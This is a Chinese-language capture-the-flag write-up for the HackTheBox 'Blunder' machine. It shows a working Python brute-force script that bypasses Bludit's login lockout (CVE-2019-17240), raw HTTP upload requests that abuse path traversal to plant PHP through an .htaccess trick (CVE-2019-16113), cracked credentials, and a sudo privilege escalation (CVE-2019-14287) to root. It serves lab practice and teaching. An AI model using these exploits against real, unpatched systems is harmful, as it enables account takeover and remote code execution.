HackTheBox::Blunder

玩一手HTB


img

打开靶机就一些无关紧要的文字,dirsearch扫一下目录可以扫到登录后台,我们可以发现靶机使用了 Bludit cms

在看了一些Bludit的漏洞之后,发现在没有登录、我们又只有一个后台地址的情况下,弱口令比较靠谱

CVE-2019-17240

Bludit是一套开源的轻量级博客内容管理系统(CMS)。

Bludit 3.9.2版本中的 bl-kernel/security.class.php 一些代码将检查主机进行的错误登录尝试次数。如果主机进行10次不正确的尝试,则会暂时阻止它们,以减轻暴力破解的企图。攻击者通过使用多个伪造的X-Forwarded-For或Client-IP HTTP标头利用该漏洞绕过保护机制。

爆破了半天,无果。

看了wp之后,我们找到了本来没有被dirsearch扫到的/todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

可以猜到用户名可能是 fergus ,但是密码需要用到cewl来生成弱口令字典

cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.191/

img

然后我们利用改装过后的CVE-2019-17240的poc来打:

#!/usr/bin/env python3
import re
import requests
def open_ressources(file_path):
    return [item.replace("\n", "") for item in open(file_path).readlines()]
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('wordlist.txt')
for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

img

最后在第一百多位爆破出用户名fergus密码RolandDeschain

进入后台。

CVE-2019-16113

文章说的很详细,通过更改uuid的值来指定上传文件的位置,也就是目录穿越

然后不符合图片后缀的文件会先被移动到/bl-content/tmp/temp/目录下,然后进行删除,我们利用intruder进行条件竞争

上传.htaccess文件,把jpg解析为php:

POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.§191§/admin/edit-content/blender
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1197595220477940257964308486
Content-Length: 560
Connection: close
Cookie: BLUDIT-KEY=k35lg8hngofh6kvif51i37m0o5
-----------------------------1197595220477940257964308486
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg
RewriteEngine off
AddType application/x-httpd-php jpg
-----------------------------1197595220477940257964308486
Content-Disposition: form-data; name="uuid"
21b8a0e80e433cb7453e7d72382c6bc1
-----------------------------1197595220477940257964308486
Content-Disposition: form-data; name="tokenCSRF"
c623c868d292dec9b4e11c104f54c9e3dde971ee
-----------------------------1197595220477940257964308486--

上传恶意wh1sper.jpg到/bl-content/tmp/temp/目录:

POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.§191§/admin/edit-content/blender
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1197595220477940257964308486
Content-Length: 589
Connection: close
Cookie: BLUDIT-KEY=k35lg8hngofh6kvif51i37m0o5
-----------------------------1197595220477940257964308486
Content-Disposition: form-data; name="images[]"; filename="wh1sper.jpg"
Content-Type: image/jpeg
<?php file_put_contetns("../wh1sper.php","<?php phpinfo();?>");?>
-----------------------------1197595220477940257964308486
Content-Disposition: form-data; name="uuid"
21b8a0e80e433cb7453e7d72382c6bc1/../../../tmp/temp
-----------------------------1197595220477940257964308486
Content-Disposition: form-data; name="tokenCSRF"
c623c868d292dec9b4e11c104f54c9e3dde971ee
-----------------------------1197595220477940257964308486--

获得shell:

img

拿到了shell之后根目录并没有我们想要的东西,我们这个账户并没有权限查看/root目录;

我们可以在www目录下看到另外一个版本的bludit,并且再user.php里面可以找到另外一个账户的账号密码

img

img

利用kali自带的 hash-identifier 进行识别:

root@wh1sper:~# hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: faca404fd5c0a31cf1897b823c695c85cffeb98d
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

https://md5decrypt.net/en/Sha1/解码得到:Password120

冰蝎终端:

su hugo
Password120

我们切换到了hugo用户,但是还是没有root权限

hugo@blunder:/var/www/bludit-3.9.2$ sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash

CVE-2019-14287

Google (ALL, !root) /bin/bash 之后可以用这种方式提权:

hugo@blunder:/var/www/bludit-3.9.2$ sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2# cat /root/root.txt
b1466707cf5be5f66b8be2c4a525e066
root@blunder:/var/www/bludit-3.9.2#

就可以得到root.txt了,另外home目录下还有个user.txt

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇